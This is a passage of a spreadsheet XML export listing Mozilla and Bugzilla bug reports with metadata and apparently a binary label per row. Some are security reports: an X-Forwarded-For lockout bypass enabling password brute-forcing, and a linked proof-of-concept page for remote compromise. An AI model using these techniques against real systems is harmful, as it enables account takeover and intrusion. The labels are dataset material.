      </c>
      <c r="X2311" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2312">
      <c r="A2312" t="n">
        <v>136180</v>
      </c>
      <c r="B2312" t="inlineStr">
        <is>
          <t>2002-04-08 09:21:51 -0700</t>
        </is>
      </c>
      <c r="C2312" t="inlineStr">
        <is>
          <t>'FILTER html' used in *.txt.tmpl files instead of 'FILTER uri'</t>
        </is>
      </c>
      <c r="D2312" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E2312" t="n">
        <v>1</v>
      </c>
      <c r="F2312" t="n">
        <v>1</v>
      </c>
      <c r="G2312" t="n">
        <v>4</v>
      </c>
      <c r="H2312" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2312" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2312" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K2312" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L2312" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2312" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2312" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2312" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2312" t="inlineStr"/>
      <c r="Q2312" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2312" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2312" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T2312" t="n">
        <v>1</v>
      </c>
      <c r="U2312" t="n">
        <v>0</v>
      </c>
      <c r="V2312" t="n">
        <v>42</v>
      </c>
      <c r="W2312" t="inlineStr">
        <is>
          <t>The patch for Bug 133423 added 'FILTER html' to variables in:
  template/default/token/emailchangenew.txt.tmpl
  template/default/token/emailchangeold.txt.tmpl
However, the output of these variables appears as part of a URL
and should be filtered using 'uri' instead of 'html'.  Patch to
follow shortly.</t>
        </is>
      </c>
      <c r="X2312" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2313">
      <c r="A2313" t="n">
        <v>511859</v>
      </c>
      <c r="B2313" t="inlineStr">
        <is>
          <t>2009-08-21 05:36:19 -0700</t>
        </is>
      </c>
      <c r="C2313" t="inlineStr">
        <is>
          <t>Utf8ToOneUcs4Char in jsstr.cpp ,overlong UTF-8 seqence detection problem.</t>
        </is>
      </c>
      <c r="D2313" t="inlineStr">
        <is>
          <t>2011-04-14 18:31:16 -0700</t>
        </is>
      </c>
      <c r="E2313" t="n">
        <v>1</v>
      </c>
      <c r="F2313" t="n">
        <v>1</v>
      </c>
      <c r="G2313" t="n">
        <v>3</v>
      </c>
      <c r="H2313" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2313" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2313" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2313" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2313" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2313" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2313" t="inlineStr">
        <is>
          <t>[sg:want?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2313" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2313" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2313" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2313" t="n">
        <v>1</v>
      </c>
      <c r="U2313" t="n">
        <v>0</v>
      </c>
      <c r="V2313" t="n">
        <v>24</v>
      </c>
      <c r="W2313" t="inlineStr">
        <is>
          <t>Created attachment 395816
testcase
see http://mxr.mozilla.org/mozilla-central/source/js/src/jsstr.cpp#5132
&gt;    /* from Unicode 3.1, non-shortest form is illegal */
&gt;    static const uint32 minucs4Table[] = {
&gt;        0x00000080, 0x00000800, 0x0001000, 0x0020000, 0x0400000
&gt;    };
It should be as following (three zeros are missing)
    /* from Unicode 3.1, non-shortest form is illegal */
    static const uint32 minucs4Table[] = {
        0x00000080, 0x00000800, 0x00010000, 0x00200000, 0x04000000
    };</t>
        </is>
      </c>
      <c r="X2313" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2314">
      <c r="A2314" t="n">
        <v>728639</v>
      </c>
      <c r="B2314" t="inlineStr">
        <is>
          <t>2012-02-18 19:27:43 -0800</t>
        </is>
      </c>
      <c r="C2314" t="inlineStr">
        <is>
          <t>[SECURITY] User lockout policy can be bypassed by altering the X-FORWARDED-FOR header</t>
        </is>
      </c>
      <c r="D2314" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:37 -0700</t>
        </is>
      </c>
      <c r="E2314" t="n">
        <v>1</v>
      </c>
      <c r="F2314" t="n">
        <v>1</v>
      </c>
      <c r="G2314" t="n">
        <v>4</v>
      </c>
      <c r="H2314" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2314" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2314" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K2314" t="inlineStr">
        <is>
          <t>3.5.3</t>
        </is>
      </c>
      <c r="L2314" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2314" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2314" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2314" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2314" t="inlineStr">
        <is>
          <t>[infrasec:auth][ws:moderate]</t>
        </is>
      </c>
      <c r="Q2314" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2314" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2314" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T2314" t="n">
        <v>1</v>
      </c>
      <c r="U2314" t="n">
        <v>0</v>
      </c>
      <c r="V2314" t="n">
        <v>31</v>
      </c>
      <c r="W2314" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Steps to reproduce:
It is possible to bypass the user lockout policy by using the "X-FORWARDED-FOR" in the header of the request. 
The problem is because of the "remote_ip" function in "Bugzilla/Util.pm" which adds this header value to the user's IP address (there is also no validation on this field). However, this "X-FORWARDED-FOR" can be controlled by an attacker to brute force the other people username/password. The "remote_ip" function also has been used in lockout modules ("Bugzilla/User.pm: account_ip_login_failures()") which is the reason of having this issue.
Please let me know if it can be eligible for the bug bounty too.
Actual results:
It is possible to brute force a password without being locked by setting the "X-FORWARDED-FOR" value in the header of the authentication request to one of these:
1- A complete random IP or String
2- A string with the length of more than 26 characters. Ex.: "123456789012345678901234567"
Expected results:
It should prevent from brute force attack.
My recommendation is:
1- First we need to have a complete validation (characters, length, format) for $ENV{'HTTP_X_FORWARDED_FOR'} in the "remote_ip" function.
2- This value should not be used in the user's lockout process as it can be controlled by the user. Only the main IP address should be fine for this action ($ENV{'REMOTE_ADDR'}) although it can be a proxy IP address.</t>
        </is>
      </c>
      <c r="X2314" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2315">
      <c r="A2315" t="n">
        <v>1268019</v>
      </c>
      <c r="B2315" t="inlineStr">
        <is>
          <t>2016-04-27 06:14:37 -0700</t>
        </is>
      </c>
      <c r="C2315" t="inlineStr">
        <is>
          <t>Incorrect icon is displayed for files in Download Manager</t>
        </is>
      </c>
      <c r="D2315" t="inlineStr">
        <is>
          <t>2020-12-21 10:31:59 -0800</t>
        </is>
      </c>
      <c r="E2315" t="n">
        <v>1</v>
      </c>
      <c r="F2315" t="n">
        <v>1</v>
      </c>
      <c r="G2315" t="n">
        <v>6</v>
      </c>
      <c r="H2315" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2315" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2315" t="inlineStr">
        <is>
          <t>Download Manager</t>
        </is>
      </c>
      <c r="K2315" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L2315" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2315" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2315" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2315" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2315" t="inlineStr">
        <is>
          <t>[fennec68.1]</t>
        </is>
      </c>
      <c r="Q2315" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2315" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2315" t="inlineStr">
        <is>
          <t>Firefox 70</t>
        </is>
      </c>
      <c r="T2315" t="n">
        <v>1</v>
      </c>
      <c r="U2315" t="n">
        <v>0</v>
      </c>
      <c r="V2315" t="n">
        <v>32</v>
      </c>
      <c r="W2315" t="inlineStr">
        <is>
          <t>Created attachment 8745996
Screenshot_20160427-160606.png
Tested using:
Device: Sony Xperia Z2 Tablet (Android 5.0.2) and Nexus 9 (Android 6.0)
Steps to reproduce:
1. Open each of the links and download the files:
http://1.usa.gov/deeXKM
http://goo.gl/wC8xy
http://goo.gl/bl0U
2. Open the Download Manager
Expected results:
- Each file has the correct icon of the app associated with the file
Actual results:
- Incorrect icon is displayed.
- Please see the attached screenshot</t>
        </is>
      </c>
      <c r="X2315" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2316">
      <c r="A2316" t="n">
        <v>432650</v>
      </c>
      <c r="B2316" t="inlineStr">
        <is>
          <t>2008-05-07 11:15:29 -0700</t>
        </is>
      </c>
      <c r="C2316" t="inlineStr">
        <is>
          <t>unit test boxes disappeared from Mozilla2 tinderbox</t>
        </is>
      </c>
      <c r="D2316" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2316" t="n">
        <v>1</v>
      </c>
      <c r="F2316" t="n">
        <v>1</v>
      </c>
      <c r="G2316" t="n">
        <v>5</v>
      </c>
      <c r="H2316" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2316" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2316" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2316" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2316" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2316" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2316" t="inlineStr"/>
      <c r="Q2316" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2316" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2316" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2316" t="n">
        <v>1</v>
      </c>
      <c r="U2316" t="n">
        <v>0</v>
      </c>
      <c r="V2316" t="n">
        <v>2</v>
      </c>
      <c r="W2316" t="inlineStr">
        <is>
          <t>There used to be unit test boxes showing up on http://tinderbox.mozilla.org/showbuilds.cgi?tree=Mozilla2 but they don't show up there anymore.  We need these boxes back in order to open mozilla-central.</t>
        </is>
      </c>
      <c r="X2316" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2317">
      <c r="A2317" t="n">
        <v>1079925</v>
      </c>
      <c r="B2317" t="inlineStr">
        <is>
          <t>2014-10-08 08:25:29 -0700</t>
        </is>
      </c>
      <c r="C2317" t="inlineStr">
        <is>
          <t>Clear github-sync nodes off seamicro</t>
        </is>
      </c>
      <c r="D2317" t="inlineStr">
        <is>
          <t>2015-07-28 11:46:34 -0700</t>
        </is>
      </c>
      <c r="E2317" t="n">
        <v>1</v>
      </c>
      <c r="F2317" t="n">
        <v>1</v>
      </c>
      <c r="G2317" t="n">
        <v>5</v>
      </c>
      <c r="H2317" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2317" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J2317" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2317" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2317" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2317" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2317" t="inlineStr"/>
      <c r="Q2317" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2317" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2317" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2317" t="n">
        <v>1</v>
      </c>
      <c r="U2317" t="n">
        <v>0</v>
      </c>
      <c r="V2317" t="n">
        <v>9</v>
      </c>
      <c r="W2317" t="inlineStr">
        <is>
          <t>github-sync1.dmz.scl3
github-sync2.dmz.scl3
github-sync4.dmz.scl3
github-sync1-dev.dmz.scl3
The above hosts are on seamicro nodes in scl3.  The chassis that they are in comes off warranty on 2015-02-01 and is slated to be decom'ed, so they need a new home/ to be decom'ed.
After discussions with Hal, the 1/2/4 blades are marginal p2v candidates due to SSD's, high IOPS, and inode counts; dev could be a p2v candidate if needed.
The more beefy HP blade that is github-sync3.dmz.scl3 is not part of this bug, per se, but is somewhat codependent on these blades going away.</t>
        </is>
      </c>
      <c r="X2317" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2318">
      <c r="A2318" t="n">
        <v>1192226</v>
      </c>
      <c r="B2318" t="inlineStr">
        <is>
          <t>2015-08-07 06:18:04 -0700</t>
        </is>
      </c>
      <c r="C2318" t="inlineStr">
        <is>
          <t>vp9_init_context_buffers</t>
        </is>
      </c>
      <c r="D2318" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:12 -0700</t>
        </is>
      </c>
      <c r="E2318" t="n">
        <v>1</v>
      </c>
      <c r="F2318" t="n">
        <v>1</v>
      </c>
      <c r="G2318" t="n">
        <v>3</v>
      </c>
      <c r="H2318" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2318" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2318" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2318" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2318" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2318" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2318" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2318" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2318" t="inlineStr">
        <is>
          <t>[adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q2318" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2318" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2318" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T2318" t="n">
        <v>1</v>
      </c>
      <c r="U2318" t="n">
        <v>0</v>
      </c>
      <c r="V2318" t="n">
        <v>38</v>
      </c>
      <c r="W2318" t="inlineStr">
        <is>
          <t>Created attachment 8644931
repro.webm
The attached webm file crash.
0b3df40c 52fb6769 MSVCR120!memset+0x75 [f:\dd\vctools\crt\crtw32\string\i386\memset.asm @ 136]
0b3df428 52fb6960 xul!setup_mi+0x4b [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\common\vp9_alloccommon.c @ 49]
0b3df430 52feca10 xul!vp9_init_context_buffers+0x8 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\common\vp9_alloccommon.c @ 197]
0b3df440 52fecd0f xul!resize_context_buffers+0x95 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\decoder\vp9_decodeframe.c @ 650]
0b3df460 52fec6ff xul!setup_frame_size+0x26 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\decoder\vp9_decodeframe.c @ 659]
0b3df488 52fed4be xul!read_uncompressed_header+0x217 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\decoder\vp9_decodeframe.c @ 1251]
0b3df530 52ff0016 xul!vp9_decode_frame+0x6e [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\decoder\vp9_decodeframe.c @ 1455]
0b3df564 5306601c xul!vp9_receive_compressed_data+0x112 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\decoder\vp9_decoder.c @ 264]
0b3df5e8 530661fa xul!decode_one+0xbe [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\vp9_dx_iface.c @ 312]
0b3df648 53088465 xul!decoder_decode+0x17f [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vp9\vp9_dx_iface.c @ 412]
0b3df664 52ab0456 xul!vpx_codec_decode+0x3e [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\libvpx\vpx\src\vpx_decoder.c @ 123]
0b3df848 52ab0795 xul!mozilla::SoftwareWebMVideoDecoder::DecodeVideoFrame+0x1ff [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\media\webm\softwarewebmvideodecoder.cpp @ 153]
0b3df864 52a4d7c3 xul!mozilla::WebMReader::DecodeVideoFrame+0x4c [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\media\webm\webmreader.cpp @ 1049]
0b3df890 52a43ab5 xul!mozilla::MediaDecoderReader::RequestVideoData+0x76 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\media\mediadecoderreader.cpp @ 289]
0b3df8b0 52a4e358 xul!mozilla::detail::MethodCallWithTwoArgs&lt;mozilla::MediaPromise&lt;nsRefPtr&lt;mozilla::VideoData&gt;,enum mozilla::MediaDecoderReader::NotDecodedReason,1&gt;,mozilla::MediaDecoderReader,bool,__int64&gt;::Invoke+0x1c [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\media\mediapromise.h @ 621]
0b3df8c0 52a4fb39 xul!mozilla::detail::ProxyRunnable&lt;mozilla::MediaPromise&lt;nsRefPtr&lt;mozilla::AudioData&gt;,enum mozilla::MediaDecoderReader::NotDecodedReason,1&gt; &gt;::Run+0x12 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\media\mediapromise.h @ 639]
0b3df8e4 51b87509 xul!mozilla::MediaTaskQueue::Runner::Run+0xbd [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\media\mediataskqueue.cpp @ 233]
0b3df90c 51b8f5a6 xul!nsThreadPool::Run+0x238 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\threads\nsthreadpool.cpp @ 227]
0b3dfa2c 51c1c455 xul!nsThread::ProcessNextEvent+0x2b2 [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\threads\nsthread.cpp @ 861]
0b3dfa48 51c1c3e8 xul!NS_ProcessNextEvent+0x1a [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\glue\nsthreadutils.cpp @ 265]</t>
        </is>
      </c>
      <c r="X2318" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2319">
      <c r="A2319" t="n">
        <v>987994</v>
      </c>
      <c r="B2319" t="inlineStr">
        <is>
          <t>2014-03-25 14:13:17 -0700</t>
        </is>
      </c>
      <c r="C2319" t="inlineStr">
        <is>
          <t>multiple apps regressed cold_load_launch time by 300ms on Mar 24</t>
        </is>
      </c>
      <c r="D2319" t="inlineStr">
        <is>
          <t>2014-06-04 09:50:24 -0700</t>
        </is>
      </c>
      <c r="E2319" t="n">
        <v>1</v>
      </c>
      <c r="F2319" t="n">
        <v>1</v>
      </c>
      <c r="G2319" t="n">
        <v>6</v>
      </c>
      <c r="H2319" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2319" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2319" t="inlineStr">
        <is>
          <t>Gaia::System::Window Mgmt</t>
        </is>
      </c>
      <c r="K2319" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2319" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2319" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2319" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2319" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2319" t="inlineStr">
        <is>
          <t>[c=progress p= s= u=2.0] [b2gperf_regression]</t>
        </is>
      </c>
      <c r="Q2319" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2319" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2319" t="inlineStr">
        <is>
          <t>2.0 S2 (23may)</t>
        </is>
      </c>
      <c r="T2319" t="n">
        <v>1</v>
      </c>
      <c r="U2319" t="n">
        <v>0</v>
      </c>
      <c r="V2319" t="n">
        <v>26</v>
      </c>
      <c r="W2319" t="inlineStr">
        <is>
          <t>The cold_load time of multiple apps regressed by 300ms on March 24:
https://datazilla.mozilla.org/b2g/?branch=master&amp;device=hamachi&amp;range=7&amp;test=cold_load_time&amp;app_list=contacts,gallery,messages,phone,settings&amp;app=phone&amp;gaia_rev=9da1b9c11bf518bc&amp;gecko_rev=b31f92b6e63affd7&amp;plot=median
Regression range:
  https://github.com/mozilla-b2g/gaia/compare/d4655e7fed7403...9da1b9c11bf5
  http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=fa098f9fe89c&amp;tochange=5c0673441fc8</t>
        </is>
      </c>
      <c r="X2319" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2320">
      <c r="A2320" t="n">
        <v>292691</v>
      </c>
      <c r="B2320" t="inlineStr">
        <is>
          <t>2005-05-02 20:10:45 -0700</t>
        </is>
      </c>
      <c r="C2320" t="inlineStr">
        <is>
          <t>Full Remote Compromise using some of my previous vulns</t>
        </is>
      </c>
      <c r="D2320" t="inlineStr">
        <is>
          <t>2007-04-01 15:01:38 -0700</t>
        </is>
      </c>
      <c r="E2320" t="n">
        <v>1</v>
      </c>
      <c r="F2320" t="n">
        <v>1</v>
      </c>
      <c r="G2320" t="n">
        <v>2</v>
      </c>
      <c r="H2320" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2320" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2320" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2320" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2320" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2320" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2320" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2320" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2320" t="inlineStr">
        <is>
          <t>[sg:fix] Keep private until 290982 fixed. 293302 is public</t>
        </is>
      </c>
      <c r="Q2320" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2320" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2320" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2320" t="n">
        <v>1</v>
      </c>
      <c r="U2320" t="n">
        <v>0</v>
      </c>
      <c r="V2320" t="n">
        <v>54</v>
      </c>
      <c r="W2320" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Using a couple of my previous vulnerabilities, a malicious website owner can 
compromise a victim's machine. All the victim must do is visit the malicious 
page and click anywhere within the page (link, text, etc)
Reproducible: Always
Steps to Reproduce:
1. http://greyhatsecurity.org/vulntests/ffrc.htm
2. Click anywhere on screen
Actual Results:  
Batch file is written to hard drive and launched
Expected Results:  
Javascript should not be stored in history. Also, the security dialog for 
installing addons should filter images being passed as the addon icon</t>
        </is>
      </c>
      <c r="X2320" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2321">
      <c r="A2321" t="n">
        <v>1293985</v>
      </c>
      <c r="B2321" t="inlineStr">
        <is>
          <t>2016-08-10 04:18:23 -0700</t>
        </is>
      </c>
      <c r="C2321" t="inlineStr">
        <is>
          <t>Crash in FlushLayoutRecursive</t>
        </is>
      </c>
      <c r="D2321" t="inlineStr">
        <is>
          <t>2017-11-12 19:01:23 -0800</t>
        </is>
      </c>
      <c r="E2321" t="n">
        <v>1</v>
      </c>
      <c r="F2321" t="n">
        <v>1</v>
      </c>
      <c r="G2321" t="n">
        <v>3</v>
      </c>
      <c r="H2321" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2321" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2321" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2321" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L2321" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2321" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2321" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2321" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2321" t="inlineStr">
        <is>
          <t>[adv-esr45.6+]</t>
        </is>
      </c>
      <c r="Q2321" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2321" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2321" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T2321" t="n">
        <v>1</v>
      </c>
      <c r="U2321" t="n">
        <v>0</v>
      </c>
      <c r="V2321" t="n">
        <v>22</v>
      </c>
      <c r="W2321" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-4329e93a-6811-4fc5-ab7b-1ca962160810.
=============================================================
Crashing Thread (0)
Frame 	Module 	Signature 	Source
0 		@0x5 	
1 	xul.dll 	FlushLayoutRecursive(nsIDocument*, void*) 	layout/base/nsPresShell.cpp:3653
2 	xul.dll 	nsDocument::EnumerateSubDocuments(bool (*)(nsIDocument*, void*), void*) 	dom/base/nsDocument.cpp:8845
3 	xul.dll 	FlushLayoutRecursive(nsIDocument*, void*) 	layout/base/nsPresShell.cpp:3653
4 	xul.dll 	nsDocument::EnumerateSubDocuments(bool (*)(nsIDocument*, void*), void*) 	dom/base/nsDocument.cpp:8845
5 	xul.dll 	FlushLayoutRecursive(nsIDocument*, void*) 	layout/base/nsPresShell.cpp:3653
6 	xul.dll 	nsDocument::EnumerateSubDocuments(bool (*)(nsIDocument*, void*), void*) 	dom/base/nsDocument.cpp:8845
7 	xul.dll 	FlushLayoutRecursive(nsIDocument*, void*) 	layout/base/nsPresShell.cpp:3653
8 	xul.dll 	nsDocument::EnumerateSubDocuments(bool (*)(nsIDocument*, void*), void*) 	dom/base/nsDocument.cpp:8845
9 	xul.dll 	FlushLayoutRecursive(nsIDocument*, void*) 	layout/base/nsPresShell.cpp:3653
10 	xul.dll 	nsDocument::EnumerateSubDocuments(bool (*)(nsIDocument*, void*), void*) 	dom/base/nsDocument.cpp:8845
11 	xul.dll 	FlushLayoutRecursive(nsIDocument*, void*) 	layout/base/nsPresShell.cpp:3653
